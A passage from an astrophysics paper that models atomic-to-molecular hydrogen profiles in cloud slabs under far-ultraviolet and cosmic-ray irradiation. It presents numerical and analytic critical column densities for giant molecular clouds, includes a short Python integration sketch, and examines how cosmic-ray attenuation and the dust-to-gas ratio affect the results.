(39) for weak (\(\alpha G\ll 1\)) isotropic FUV fields, GMCs are critical for \[\beta\ =\ \frac{7.0\times 10^{-2}}{\tilde{\sigma}_{g}}\times\Big{(}\frac{N_{ \rm 22,GMC}}{1.5}\Big{)}^{-1}\ \alpha G\quad, \tag{42}\] or for \[\zeta_{-16}\ =\ 0.6\ \Big{(}\frac{N_{\rm 22,GMC}}{1.5}\Big{)}^{-1}\ I_{\rm UV}\quad, \tag{43}\] independent of \(\tilde{\sigma}_{g}\), and independent of the gas density or cloud mass. We stress again that Eqs. (42) and (43) hold for either slabs exposed to two-sided beamed fields or spheres illuminated by isotropic radiation. In Eq. (43) we have assumed that \(C=1\) since the PDRs and CRZs overlap in this limit (see SS 3.1.1). Remarkably, in the weak-field limit, and for an ambient \(I_{\rm UV}\approx 1\), the critical ionization rate for typical GMCs is close to the characteristic Galactic ionization rate \(\zeta_{-16}\approx 1\). Our analysis of the GMCs thus far does not include the effects of CR attenuation, which we do consider in SS 3.3 below. CR attenuation increases the critical ionization rates further. ## 3 Computations We now present numerical computations of the HI and H\({}_{2}\) density profiles and integrated HI column densities produced in gas slabs that are irradiated by combined fluxes of FUV photons and cosmic-rays. As is indicated by our analytic expressions Eqs. (19) and (22), the basic dimensionless parameter for the FUV driven HI-to-H\({}_{2}\) density profiles is \(\alpha G\) (Eq. [23]) rather than \(\alpha\) alone (see also S14). For the cosmic-rays the basic parameter is \(\beta\) (Eq.[15]). In this paper we are focussing on the regime \(\beta\lesssim 1\) for which the gas is molecular in the absence of FUV, even without any CR attenuation. But the residual atomic component produced by the cosmic-ray bombardment contributes to the build up of the HI column densities. We consider a wide range of conditions i.e., a range of \(\alpha G\), and \(\beta\), for varying dust-to-gas abundance ratios \(\tilde{\sigma}_{g}\), and we present results with and without the inclusion of cosmic-ray attenuation. We use _Scipy_ ODEINT to integrate Eq. (13) and solve for \(x_{\rm HI}/x_{\rm H_{2}}\) as a function of gas column \(N\equiv N_{\rm HI}+2N_{\rm H_{2}}\), subject to \(x_{\rm HI}+2x_{\rm H_{2}}=1\), for any \(\alpha G\), \(\beta\) and \(\tilde{\sigma}_{g}\). When including CR attenuation we use the simple power-law form Eq. (12) for \(s(N)\), assuming a normal magnetic field orientation \({\rm cos}\theta=1\) in the definition of \(N_{\rm eff}\). We compare our numerical integrations to our analytic approximations for \(N_{\rm HI}(N)\) given by Eqs. (19) and (22). As our first example, in Fig. 1 we show results for \(\alpha G=1\), \(\beta=0.1\), and \(\tilde{\sigma}_{g}=1\). The FUV radiation and cosmic-rays are incident from the left (one-sided irradiation). In the upper panel, CR attenuation is not included. In the lower panel CR attenuation is included. For \(\alpha G=1\), and with \(\tilde{\sigma}_{g}=1\), the ratio of the (unattenuated) FUV field intensity to the gas density \(I_{\rm UV}/n_{2}=1.7\), for a temperature \(T_{2}=1\) (see Eq. [23]). The average self-shielding factor \(G=3.0\times 10^{-5}\) (Eq. [21]). For \(\beta=0.1\), the ratio of the cosmic-ray ionization rate to the gas density is \(\zeta_{-16}/n_{2}=3.33\), for \(C=\sqrt{5}\), and \(\phi=2\) (see Eq. [15]). We plot \(x_{\rm HI}\) and \(2x_{\rm H_{2}}\) (blue and orange curves) as functions of the hydrogen column density \(N\). 
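The integration itself is compact. The sketch below is our minimal reconstruction of this calculation for the Fig. 1 parameters; it is not the authors' code, and it substitutes a commonly used two-term fit for the Draine & Bertoldi (1996) self-shielding function (with an assumed Doppler parameter \(b=2\) km s\({}^{-1}\)) for the full multi-line treatment, so the resulting profiles are approximate.

```python
import numpy as np
from scipy.integrate import odeint

sigma_g = 1.9e-21            # dust cross section per H nucleus, cm^2 (Eq. [6], sigma_g_tilde = 1)
alpha_G, beta_ = 1.0, 0.1    # Fig. 1 parameters
G = 3.0e-5                   # mean self-shielding factor for sigma_g_tilde = 1 (Eq. [21])
alpha_ = alpha_G / G

def f_shield(N_H2, b5=2.0):
    """Approximate Draine & Bertoldi (1996)-type H2 self-shielding fit (b5 = b / 1e5 cm/s)."""
    x = N_H2 / 5e14
    return (0.965 / (1.0 + x / b5) ** 2
            + 0.035 / np.sqrt(1.0 + x) * np.exp(-8.5e-4 * np.sqrt(1.0 + x)))

def s_cr(N, a=0.385, N_cr=1e19):
    """Eq. (12), 'model H' attenuation; replace with 1.0 for the unattenuated case."""
    N = np.asarray(N, dtype=float)
    return np.where(N < N_cr, 1.0, (np.maximum(N, N_cr) / N_cr) ** (-a))

def dNHI_dNH2(N_HI, N_H2):
    """Right-hand side of the ODE, Eq. (13)."""
    N = N_HI + 2.0 * N_H2
    return 0.5 * alpha_ * f_shield(N_H2) * np.exp(-sigma_g * N) + beta_ * s_cr(N)

N_H2_grid = np.concatenate(([0.0], np.logspace(10, 22.5, 2000)))   # cm^-2
N_HI = odeint(dNHI_dNH2, 0.0, N_H2_grid).ravel()   # N_HI(N_H2), initial condition N_HI(0) = 0
N_tot = N_HI + 2.0 * N_H2_grid
x_H2 = 1.0 / (2.0 + dNHI_dNH2(N_HI, N_H2_grid))    # since dN_HI/dN_H2 = x_HI / x_H2
x_HI = 1.0 - 2.0 * x_H2
```

The transition point (\(x_{\rm HI}=2x_{\rm H_{2}}\)) and the growth of \(N_{\rm HI}\) can then be read off against \(N_{\rm tot}\), which is how profiles of the kind shown in Fig. 1 are produced.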
The corresponding dust opacity, \(\tau_{\rm dust}\), is shown along the auxiliary (upper) \(x\)-axes. The black dashed curves are the depth-dependent HI column densities found in our numerical integration of Eq. (13). The column density scale is shown along the righthand auxiliary \(y\)-axis. The overlying red dashed curves show the analytically computed HI columns. The agreement between the numerical and the analytically computed HI columns is excellent. As expected, the hydrogen is primarily atomic at the cloud edges, and the molecular fractions are very small, with \(x_{\rm H_{2}}\approx x_{\rm H_{2}}/x_{\rm HI}=2/\alpha=6.2\times 10^{-5}\). Within the CRZs the gas is primarily molecular. In the absence of CR attenuation the HI fractions approach a cosmic-ray floor \(x_{\rm HI}=\beta/2=5\times 10^{-2}\) (upper panel). The red marker dots indicate the numerically computed HI-to-H\({}_{2}\) transition points, defined as the cloud depths where \(x_{\rm HI}=2x_{\rm H_{2}}\) (or \(x_{\rm HI}=1/2\)). For the models in Fig. 1 these occur at \(N_{\rm tran}=1.4\times 10^{20}\) cm\({}^{-2}\), or \(\tau_{\rm dust, tran}=0.26\). The vertical dashed green lines indicate these positions as given by the analytic BS16 formula for the transition point (their Eq. [39]). We discuss this formula in the Appendix (Eq. [A1])) and its continued range of applicability when cosmic-rays are included. The vertical red dashed lines mark the columns, \(N_{90}\), where 90% of the incident FUV radiation is absorbed. This occurs at \(\tau_{\rm dust}\sim 1\), and defines the inner edge of the PDR. The HI column produced by photodissociation is \(N_{\rm HI,PDR}=2.1\times 10^{20}\) cm\({}^{-2}\) (see Eq. [24]). The vertical blue dashed lines mark the critical columns, \(N_{\rm crit}\) where the cosmic-rays start dominating the growth of the HI columns. Without CR attenuation this occurs at \(N_{\rm crit}=4.4\times 10^{21}\) cm\({}^{-2}\). The corresponding critical dust opacity is \(\tau_{\rm dust,crit}=8.4\). When CR attenuation is included (lower panel) the atomic fraction falls below the \(\beta=0.1\) cosmic-ray floor of \(5\times 10^{-2}\) without attenuation. The "knee" in the HI profile near \(N=2\times 10^{21}\) cm\({}^{-2}\) is where the more slowly attenuating CR ionization processes take over from exponentially reduced photodissociation in producing the HI. The atomic fraction continues to decline at greater cloud depths as \(\beta s(N)/2\), and becomes very small. The much reduced HI abundance in the CRZ when CR attenuation is included moderates the growth of the HI column density (see Fig.1) and the critical column is now \(N_{\rm crit}=7.1\times 10^{22}\) cm\({}^{-2}\), or \(\tau_{\rm dust,crit}=135.3\). When CR attenuation is included the CRZ must be 135 times larger than the PDR for cosmic-rays to contribute significantly to the production of the HI. ### Model Grid: No CR Attenuation, and \(\tilde{\sigma}_{g}=1\) #### 3.1.1 HI and H\({}_{2}\) Profiles In Fig. 2 we present an \(\alpha G\) versus \(\beta\) model grid for the HI-to-H\({}_{2}\) density profiles, and integrated HI column densities, assuming \(\tilde{\sigma}_{g}=1\), and no attenuation of the cosmic-ray ionization rates (\(s=1\)). From top to bottom, \(\alpha G\) ranges from 0.01 (weak-field limit) to 10 (strong field limit). From left to right \(\beta\) ranges from 0 to 1, i.e., weak to moderate5 cosmic-ray irradiation. 
For \(\tilde{\sigma}_{g}=1\) these ranges correspond to \(I_{\rm UV}/n_{2}\) from \(1.7\times 10^{-2}\) to 17.0, and \(\zeta_{-16}/n_{2}\) from 0 to 33.3 (for \(C=\sqrt{5}\), \(T_{2}=1\), and \(\phi=2\)). Footnote 5: We reserve the term “strong cosmic-ray irradiation” for \(\beta>2\) systems for which HI-to-H\({}_{2}\) transitions do not occur without CR attenuation. See Appendix. As in Fig. 1, in each panel we show the HI and H\({}_{2}\) fractions, \(x_{\rm HI}\) (blue curves) and \(2x_{\rm H_{2}}\) (orange curves), as computed by integrating Eq. (13) numerically. The black and red dashed curves are the HI column densities found in our numerical integrations and using our analytic formulae respectively. The agreement between the two curves is excellent across the entire parameter space. Again, the hydrogen is atomic at the cloud edges, and the molecular fractions are very small, with \(x_{\rm H_{2}}\approx x_{\rm H_{2}}/x_{\rm HI}=2/\alpha\) from \(6.2\times 10^{-3}\) to \(6.2\times 10^{-6}\). Within the CRZs the gas is (by assumption) primarily molecular, and the HI fractions approach \(x_{\rm HI}=\beta/2\), i.e. range from \(5\times 10^{-4}\) to 0.5, from small to moderate cosmic-ray ionization rates. The red dots are the HI-to-H\({}_{2}\) transition points. For the range of \(\alpha G\) in Fig. 2 these occur at gas columns, \(N_{\rm tran}\), equal to \(1.9\times 10^{17}\), \(3.9\times 10^{18}\), \(1.4\times 10^{20}\), and \(9.1\times 10^{20}\) cm\({}^{-2}\), corresponding to dust optical depths, \(\tau_{\rm dust}\), equal to \(3.6\times 10^{-4}\), \(7.4\times 10^{-3}\), 0.26, and 1.7. The vertical green dashed lines show these positions using the BS16 formula, Eq. (A1). In the weak-field limit (small \(\alpha G\)) an HI-to-H\({}_{2}\) transition is induced by H\({}_{2}\) self-shielding at small cloud depths where \(\tau_{\rm dust}\ll 1\), and dust attenuation is irrelevant for the transition point. Most of the photodissociated HI column density is built up _inside_ the predominantly molecular zone, up to \(\tau_{\rm dust}\approx 1\) where the FUV is finally fully absorbed. In the strong field limit (large \(\alpha G\)) the fully atomic layer becomes sufficiently large that the dust associated with this layer (the "HI-dust") dominates the absorption of the FUV. The transition to H\({}_{2}\) is then very sharp, and most of the HI column is produced in the outer fully dissociated layer. Because we are assuming \(\beta\leq 1\) the cosmic-rays do not inhibit transitions to molecular gas as the clouds become optically thick to the FUV, and the transition points are unaffected (see Appendix). The vertical red dashed lines shown for the \(\beta=0\) cases (leftmost column in Fig. 2) show the FUV "absorption columns", \(N_{90}\), where 90% of the photodissociated HI columns are built up. The 90% absorption depths occur at \(\tau_{\rm dust}\approx 1\), independent of \(\alpha G\), and are unaffected by the presence of cosmic-rays. We do not display the \(N_{90}\) lines for the \(\beta\neq 0\) panels. Instead, for \(\beta\neq 0\) the vertical blue dashed lines indicate the critical gas columns, \(N_{\rm crit}\), and dust opacities, \(\tau_{\rm dust,crit}\), where the cosmic-ray and FUV contributions to the integrated HI columns are equal. #### 3.1.2 Critical Dust Opacities and Gas Columns: No CR Attenuation Without significant cosmic-ray attenuation the HI column densities diverge with increasing cloud gas column (see Eq. [22]). 
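The critical depths quoted below follow directly from Eqs. (28), (29) and (31); the following snippet is our own quick numerical check of those expressions (for \(\tilde{\sigma}_{g}=1\)).

```python
import numpy as np

sigma_g = 1.9e-21    # cm^2 per H nucleus, sigma_g_tilde = 1

def tau_crit(alpha_G, beta_):
    """Eq. (29): critical dust opacity (no CR attenuation)."""
    return (2.0 + beta_) / beta_ * np.log(alpha_G / 2.0 + 1.0)

def N_crit(alpha_G, beta_):
    """Eq. (28): critical gas column in cm^-2."""
    return tau_crit(alpha_G, beta_) / sigma_g

def tau_crit_strong(alpha_G, beta_):
    """Eq. (31): strong-field approximation, 2 ln(alpha*G / 2) / beta."""
    return 2.0 * np.log(alpha_G / 2.0) / beta_

print(tau_crit(0.01, 0.001), N_crit(0.01, 0.001))   # ~10 and ~5.3e21 (weak-field limit)
print(tau_crit(1.0, 0.1), N_crit(1.0, 0.1))         # ~8.5 and ~4.5e21 (the Fig. 1 case)
print(tau_crit_strong(10.0, 0.1))                   # ~32, the approximate strong-field value
```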
The critical gas columns indicated by the blue vertical lines are consistent with Eqs. (28)-(32). For example, for \(\alpha G=0.01\) and \(\beta=0.001\), \(\tau_{\rm dust,crit}\approx\alpha G/\beta=10\) and \(N_{\rm crit}=5.3\times 10^{21}\) cm\({}^{-2}\) (see Eq. [30]). As \(\beta\) is increased for \(\alpha G=0.01\), the critical point moves inward and the PDRs and CRZs overlap, as seen in the top row of Fig. 2, and as expected for the weak-field limit. As another example, and now for the strong field limit, for \(\alpha G=10\) and \(\beta=0.1\), \(\tau_{\rm dust,crit}\approx 2{\rm ln}(\alpha G)/\beta=32\), and \(N_{\rm crit}=1.7\times 10^{22}\) cm\({}^{-2}\) (see Eq. [31]). As \(\beta\) is increased in the strong field limit, \(\tau_{\rm dust,crit}\) approaches the sharp HI-to-H\({}_{2}\) transition point, and the blue dashed lines approach the green dashed lines in Fig. 2. In Fig. 3, we plot curves as given analytically by Eq. (29) for the critical dust opacities, \(\tau_{\rm dust,crit}\), as functions of \(\alpha G\) and \(\beta\). The blue squares are the critical opacities as found numerically in Fig. 2. They lie very close to the analytic curves. The auxiliary \(y\)-axes in Fig. 3 show the corresponding critical gas column densi ties assuming \(\tilde{\sigma}_{g}=1\) (Eq. [28]). The left panel displays \(\tau_{\rm dust,crit}\) as a function of \(\beta\) (or \(\zeta_{-16}/n_{2}C\) for \(\tilde{\sigma}_{g}=1\)) for several values of \(\alpha G\) from 0.01 to 100. The right panel displays curves for \(\tau_{\rm dust,crit}\) as a function of \(\alpha G\) (or \(I_{\rm UV}/n_{2}\) for \(\tilde{\sigma}_{g}=1\)) for several values of \(\beta\) from 0.001 to 1. The curves illustrate the limiting behaviors given by Eqs. (30) and (31). For a given \(\alpha G\) the critical dust opacities and gas columns always vary inversely with \(\beta\). For a given \(\beta\), they vary linearly with \(\alpha G\) in the weak-field limit (\(\alpha G\ll 1\)) and logarithmically with \(\alpha G\) in the strong-field limit (\(\alpha G\gg 1\)). The horizontal dashed blue line in Fig. 3 is the \(\tau_{\rm dust}=1\) boundary between the PDR and the CRZ. The curves again show that in the weak-field limit, \(\alpha G\ll 1\) cosmic-ray production of the HI can become competitive with photodissociation already within the PDRs (i.e. within \(\tau_{\rm dust}\lesssim 1\)). Conversely, in the strong-field limit, \(\alpha G\gg 1\), the critical opacities become large with \(\tau_{\rm dust,crit}>1\), even if \(\beta\) approaches 1. In this limit the cosmic-ray production of the HI occurs mainly in the optically thick cloud interiors. ### Model Grid: With Cosmic-Ray Attenuation #### 3.2.1 HI and H\({}_{2}\) Profiles In Fig. 4 we display the same \(\alpha G\) versus \(\beta\) grid for the HI and H\({}_{2}\) profiles as in Fig. 2 but now with the inclusion of cosmic-ray attenuation. We again assume \(\tilde{\sigma}_{g}=1\). In all panels, we assume the broken power-law CR attenuation function \(s(N)\) as given by Eq. (12), with cos\(\theta=1\) for the magnetic field orientation. The effect of the cosmic-ray attenuation is most clearly seen for \(\beta=1\) in the righthand column of Fig. 4. Without attenuation the HI fraction \(x_{\rm HI}=1/3\) at large depths for \(\beta=1\) (see Fig. 2), and the integrated HI columns therefore rise sharply with increasing cloud depth. With attenuation the local HI fractions decrease and the resulting integrated HI columns are reduced. The black dashed curves in Fig. 
4 show the HI columns found by numerically integrating Eq. (13) (again using _Scipy_ ODEINT), but now including the attenuation function \(s(N)\). The red dashed curves show the HI columns computed using our analytic approximation Eq. (19) using Eq. (27) for the CR term. The agreement between the numerical solution and the analytic representation is excellent.

Figure 2: HI-to-H\({}_{2}\) density profiles as functions of the gas column \(N\) (lower x-axes) and the dust optical depth \(\tau_{\rm dust}\) (upper x-axes) for \(\alpha G\) from 0.01 (weak field) to 10 (strong field), and for cosmic-ray parameters \(\beta\) from 0 to 1, and with no cosmic-ray attenuation. The dust-to-gas ratio \(\tilde{\sigma}_{g}=1\). The curves are for the HI fractions \(x_{\rm HI}\) (blue), twice the H\({}_{2}\) fraction \(2x_{\rm H_{2}}\) (orange), and the HI column density \(N_{\rm HI}\), integrated numerically (dashed black), and using our analytic formula Eq. (19) (dashed red). The red dots mark the HI-to-H\({}_{2}\) transition points where \(x_{\rm HI}=2x_{\rm H_{2}}\). The analytic approximation for the transition points (Eq. [A1]) is indicated by the vertical dashed green lines. For \(\beta=0\) (left column) the vertical dashed red lines are for \(N_{90}\) where 90% of the photodissociated HI columns are built up. For \(\beta\neq 0\) the vertical dashed blue lines mark the critical cloud depths where the cosmic-ray contributions to the HI columns are equal to the photodissociated HI columns.

As in Fig. 2 the vertical blue lines in Fig. 4 mark the critical cloud depths at which the FUV and CR contributions to the HI columns are equal. Due to the reductions in the HI fractions in the CRZs the critical depths are increased compared to the no CR attenuation case. The effect is especially significant in the strong FUV field limit \(\alpha G>1\) for which the FUV contributions to the HI columns become large. (In some of the panels in Fig. 2 the blue markers do not appear because the critical depths are off scale high). The red dots in Fig. 4 show the HI-to-H\({}_{2}\) transition points where \(x_{\rm HI}=2x_{\rm H_{2}}\). The vertical green lines mark the transition points as estimated using the BS16 formula Eq. (A1). The positions of the transition points are fully controlled by the FUV radiation absorption, and are not affected by the presence of cosmic rays or the inclusion of CR attenuation.

#### 3.2.2 Critical Dust Opacities and Gas Columns: With CR Attenuation

In Fig. 5, we plot curves for the critical dust opacities, \(\tau_{\rm dust,crit}\), as functions of \(\alpha G\) and \(\beta\), but now with the inclusion of CR attenuation as for the profiles shown in Fig. 4. To generate these curves we modify Eq. (29) for \(\tau_{\rm dust,crit}\) by making the replacement given by Eq. (27) in Eq. (22). The left panel displays curves for \(\tau_{\rm dust,crit}\) as functions of \(\beta\) (or \(\zeta_{-16}/n_{2}C\) for \(\tilde{\sigma}_{g}=1\)) for several values of \(\alpha G\) from 0.01 to 100. The right panel shows \(\tau_{\rm dust,crit}\) versus \(\alpha G\) (or \(I_{\rm UV}/n_{2}\) for \(\tilde{\sigma}_{g}=1\)) for several values of \(\beta\) from 0.001 to 1. The auxiliary \(y\)-axes in Fig. 3 show the corresponding critical gas column densities assuming \(\tilde{\sigma}_{g}=1\). The blue squares are the results of the numerical integrations found in Fig. 4, and they lie very close to the analytic curves. 
The primary effect of CR attenuation is to steepen the critical curves, since attenuation dampens the growth of the HI columns preferentially at low \(\beta\) and large \(\alpha G\). For example, for \(\alpha G=0.01\) and \(\beta=0.001\), \(\tau_{\rm dust,crit}\) is increased from 10 to 200 when CR attenuation is included, with \(N_{\rm crit}\) increasing to \(1.1\times 10^{23}\) cm\({}^{-2}\). As \(\beta\) is increased for \(\alpha G=0.01\), the critical points move inward, the PDRs and CRZs overlap as seen in the top row of Fig. 4, and the attenuation effects are reduced due to the rapid build up of the CR contributions. As another example, for \(\alpha G=1\) and \(\beta=0.1\), \(\tau_{\rm dust,crit}\) increases from 8.5 to 135, with \(N_{\rm crit}\) increasing to \(7.1\times 10^{22}\) cm\({}^{-2}\).

Figure 3: Critical dust opacities, \(\tau_{\rm dust,crit}\), at which the cosmic-ray contributions to the HI column densities are equal to the photodissociated HI columns. Right panel: \(\tau_{\rm dust,crit}\) as functions of \(\alpha G\) with individual curves as given by our analytic expression Eq. (29), for \(\beta\) from 0.001 to 1. The blue squares are the numerically computed critical depths shown in Fig. 2. The auxiliary axes for \(I_{\rm UV}/n_{2}\) and \(N_{\rm crit}\) are for a dust-to-gas ratio \(\tilde{\sigma}_{g}=1\). The horizontal blue dotted line is for \(\tau_{\rm dust}=1\) below which photodissociation and cosmic-ray production of the HI overlap (see text). The horizontal red dotted line corresponds to the typical half-column density of Galactic GMCs. The vertical green line marks the intermediate \(\alpha G\approx 2\) regime, within the grey strip for which multiphased HI is possible for FUV heated gas. Left panel: \(\tau_{\rm dust,crit}\) as functions of \(\beta\) with individual curves as given by our analytic expression Eq. (29), for \(\alpha G\) from 0.01 to 100. The blue squares are the numerically computed critical depths shown in Fig. 2. The auxiliary axes for \(\zeta_{-16}/n_{2}C\) and \(N_{\rm crit}\) are for a dust-to-gas ratio \(\tilde{\sigma}_{g}=1\). The horizontal blue dotted line is for \(\tau_{\rm dust}=1\) below which photodissociation and cosmic-ray ionization overlap. The horizontal red dotted line corresponds to the typical half-column density of Galactic GMCs.

Figure 4: Model grid with curves and markers as in Fig. 2, but with the inclusion of CR attenuation.

Figure 5: As in Fig. 3 for the critical dust opacities, but with the inclusion of CR attenuation.

### GMCs and Multiphased HI

The horizontal red dashed lines in Figs. 3 and 5 mark the half-column, \(N_{\rm GMC}/2=7.5\times 10^{21}\) cm\({}^{-2}\), for typical Galactic GMCs, as discussed in SS 2.4. For any \(\alpha G\) and \(\beta\) for which \(N_{\rm crit}<N_{\rm GMC}/2\), the GMC is "supercritical" and the CRZ dominates the total HI column density. For \(N_{\rm crit}>N_{\rm GMC}/2\) the GMCs are "subcritical" and the PDR dominates the HI. GMCs are just critical for \(\alpha G\) and \(\beta\) at the intersections of the critical curves with the \(N_{\rm GMC}/2\) line. As discussed in SS 2.4, without CR attenuation and in the weak-field limit GMCs are critical for \(\beta\approx 7.0\times 10^{-2}\alpha G\), or for \(\zeta_{-16}\approx 0.6I_{\rm UV}\) (Eqs. [42] and [43]). This relation is seen in Fig. 3 moving along the red line for small \(\alpha G\). As shown in Fig. 
5, with CR attenuation the critical \(\beta\) and \(\zeta_{-16}\) are much larger. For example, for \(\alpha G=0.1\), and without CR attenuation, \(\beta=7.0\times 10^{-3}\) for critical GMCs, and this increases to \(6.0\times 10^{-2}\) when CR attenuation is included. Or, for \(I_{\rm UV}=1\), the critical ionization rate \(\zeta_{-16}\) increases from 0.6 to 5.1 for models without and with CR attenuation, respectively. The vertical green dashed lines in the righthand panels of Figs. 3 and 5 mark the intermediate \(\alpha G=2\) case (nominally \(I_{\rm UV}/n_{2}\approx 3\)), for which multiphased (WNM/CNM) HI is possible in the PDRs, as indicated by the grey strip. Without CR attenuation, and at \(\alpha G=2\), the red GMC line in Fig. 3 intersects the critical curve for \(\beta=0.1\). This is as given by Eq. (33). Fig. 5 shows that \(\beta=0.9\) when CR attenuation is included for critical GMCs with \(\alpha G=2\). For example, for the nominal \(I_{\rm UV}/n_{2}\approx 3\), the critical ratio \(\zeta_{-16}/(n_{2}C)\) increases from 1.5 to 13.5. The critical free-space ionization rate then scales with GMC mass as \[\zeta_{-16,{\rm crit}}\approx 4.5\times M_{6,{\rm GMC}}^{-1/2} \tag{44}\] when CR attenuation is included. As discussed in SS2.4, the critical columns and ionization rates for spheres illuminated isotropically are essentially identical to the critical values for two-sided slabs, where the gas column \(N\) for slabs is replaced by the mean column \(\langle N\rangle\) for spheres. This is because \(2N_{\rm HI,PDR,i}\approx N_{\rm HI,PDR}\) (see Eqs. [24] and [36]). In Fig. 6 we further consider the \(\alpha G=2\) case. We show the HI fractions \(x_{\rm HI}\) (blue dashed curves), and integrated HI column densities \(N_{\rm HI}\) (black curves), for several values of \(\beta\). In the upper panel CR attenuation is excluded, and in the lower panel CR attenuation is included. For both the dust-to-gas ratio is \(\tilde{\sigma}_{g}=1\). For \(\alpha G=2\) the HI column produced by photodissociation is \(N_{\rm HI,FUV}=3.65\times 10^{20}\) cm\({}^{-2}\). The horizontal green lines are at twice this value (see the righthand column density scale) and the intersections with the \(N_{\rm HI}\) curves are at the critical cloud depths for each \(\beta\). The vertical red lines mark the typical half-column of \(7.5\times 10^{21}\) cm\({}^{-2}\) for the Galactic GMCs. Without CR attenuation we again see that GMCs are critical for \(\beta=0.1\). With CR attenuation the critical value is much larger, with \(\beta=0.9\). This corresponds to a very large free-space ionization rate to density ratio \(\zeta_{-16}/(n_{2}CT_{2}^{1/2})=13.4\).

Figure 6: HI fractions \(x_{\rm HI}\) (dashed blue curves) and integrated HI columns \(N_{\rm HI}\) (black curves) versus cloud depth, as parameterized by the gas column, \(N\), or the dust optical depth, \(\tau_{\rm dust}\), for the intermediate, beamed field, \(\alpha G=2\) case for multiphased HI, for a dust-to-gas ratio \(\tilde{\sigma}_{g}=1\). The curves are labelled by the assumed values of \(\beta\). In the upper panel CR attenuation is not included, and in the lower panel CR attenuation is included. The horizontal green line is for an HI column equal to twice the photodissociated column for \(\alpha G=2\). The vertical red line marks the half gas column for typical Galactic GMCs.

### Dust-to-Gas Ratio

How do the HI-to-H\({}_{2}\) profiles depend on the assumed dust-to-gas ratio, as parameterized by our \(\tilde{\sigma}_{g}\)? 
The dust-to-gas ratio (as controlled by the overall metallicity) enters in two ways. First via the H\({}_{2}\) dust-grain formation rate coefficient \(R\) (eq. [3]), and second via the FUV dust absorption cross section \(\sigma_{g}\) (Eq. [6]). The formation rate coefficient, \(R\), appears in the denominators of our dimensionless parameters \(\alpha\) and \(\beta\) (Eqs. [14] and [15]) in our ODE Eq. (13). The dust absorption cross section, \(\sigma_{g}\), appears in the definition of the dust optical depth, \(\tau_{\rm dust}\), in Eq. (13). But importantly, the fundamental parameter \(\alpha G\) is only weakly dependent6 on \(\tilde{\sigma}_{g}\) due to the cancellation when taking the ratio \(\sigma_{g}/R\) (see Eq. [23]). Footnote 6: The term \((9.9/[1+8.9\tilde{\sigma}])^{0.37}\) in the definition of \(G\) (Eq. [21]) accounts for the dependence of the “H\({}_{2}\)-dust limited photodissociation rate” on \(\tilde{\sigma}_{g}\). To keep \(\alpha G\) fixed when varying \(\tilde{\sigma}_{g}\) requires a corresponding alteration of \(\alpha\) or the ratio \(I_{\rm UV}/n\). See S14 for a detailed discussion. BS16 studied the \(\beta=0\) case (i.e. no cosmic rays) and found that when expressed in terms of \(\tau_{\rm dust}\) (rather than the gas column \(N\)) then to a very good approximation, especially for \(\tilde{\sigma}_{g}\) in the range 0.1 to 10, the HI-to-H\({}_{2}\) transition points depend on just \(\alpha G\) independent of \(\tilde{\sigma}_{g}\). This is the essence of our Eq. (A1). This invariance is somewhat surprising especially in the weak-field limit where the FUV attenuation is governed purely by H\({}_{2}\) self-shielding, \(\tau_{\rm dust,tran}\ll 1\), and dust-shielding plays no role. Furthermore, at cloud depths beyond the transition points, i.e. within the molecular zones, the HI and H\({}_{2}\) density profiles as functions of \(\tau_{\rm dust}\), also depend on just \(\alpha G\), and are invariant with \(\tilde{\sigma}_{g}\) to a very good approximation. Within the fully atomic outer layers, and up to the invariant transition points, the H\({}_{2}\) profiles do depend on \(\tilde{\sigma}_{g}\), with H\({}_{2}\) fractions at the optically thin cloud edges that vary inversely with the dust abundance and the associated H\({}_{2}\) formation rate coefficient. Fig. 7 illustrates the behavior when cosmic rays are included. In this example we set \(\alpha G=1\) and \(\beta=0.1\) and present results for \(\tilde{\sigma}_{g}=0.1\), 1, and 10. In the upper panel we exclude CR attenuation, and in the lower panel CR is included according to Eq. (12). Once again, the blue and orange curves are the atomic and molecular fractions \(x_{\rm HI}\) and \(2x_{\rm H_{2}}\), and the black curves are the integrated HI column densities. The red markers indicate the transition points, as do the vertical green dashed lines according to Eq. (A1). For the three values of \(\tilde{\sigma}_{g}\), the average H\({}_{2}\) self-shielding factor \(G=5.5\times 10^{-6}\), \(3\times 10^{-5}\), and \(1.3\times 10^{-4}\), and \(\alpha=1.8\times 10^{5}\), \(3.3\times 10^{4}\) and \(7.5\times 10^{3}\). As seen in Fig. 7 the corresponding molecular fractions at the cloud edges, \(2x_{\rm H_{2}}=4/\alpha\), are \(2.2\times 10^{-5}\), \(1.2\times 10^{-4}\), and \(5.3\times 10^{-4}\). 
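These values follow directly from the BS16 fitting formula; the short check below (ours) evaluates Eq. (21) and the corresponding edge molecular fractions for the three dust-to-gas ratios.

```python
def G_mean(sigma_g_tilde):
    """Eq. (21): mean H2 self-shielding factor in an H2-dust absorption column (BS16 fit)."""
    return 3.0e-5 * sigma_g_tilde * (9.9 / (1.0 + 8.9 * sigma_g_tilde)) ** 0.37

for sg in (0.1, 1.0, 10.0):
    G = G_mean(sg)
    alpha_ = 1.0 / G               # alpha = (alpha*G)/G, with alpha*G = 1 in this example
    print(sg, G, alpha_, 4.0 * G)  # 4*G = 4/alpha = 2*x_H2 at the cloud edge
```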
When expressed in terms of the dust optical depth \(\tau_{\rm dust}\) (or equivalently \(\tilde{\sigma}_{g}\times N\)) the transition point is insensitive to \(\tilde{\sigma}_{g}\), and for our assumed \(\alpha G\) the transitions occur at \(\tau_{\rm dust}=0.2\). For our assumed \(\beta\) the cosmic rays do not affect the positions of the transition points (see Appendix). The cosmic-ray ionization rate is unaffected by the presence of dust, and in the absence of CR attenuation the HI profiles within the optically thick CRZs do not depend on \(\tilde{\sigma}_{g}\) and the atomic fraction reaches the cosmic-ray floor \(x_{\rm HI}=4.8\times 10^{-2}\) (see upper panel). However, with CR attenuation, and when expressed as functions of the dust optical depth, the HI fractions increase with \(\tilde{\sigma}_{g}\) for a given \(\tau_{\rm dust}\) (see lower panel). This is simply because the CR attenuation depends on the gas _column_ \(N=\tau_{\rm dust}/\sigma_{g}\). For our assumed CR attenuation power-law (Eq. [12]) with \(a=0.385\), \(x_{\rm HI}\) varies as \(\tilde{\sigma}_{g}^{0.385}\) at a given dust optical depth. In all cases the atomic fractions decrease with cloud depth (Eq. [26]). We have verified by explicit computation that this overall behavior is maintained for the entire range of \(\alpha G\) and \(\beta\) in our model grids for \(\tilde{\sigma}_{g}\) from 0.1 to 10.

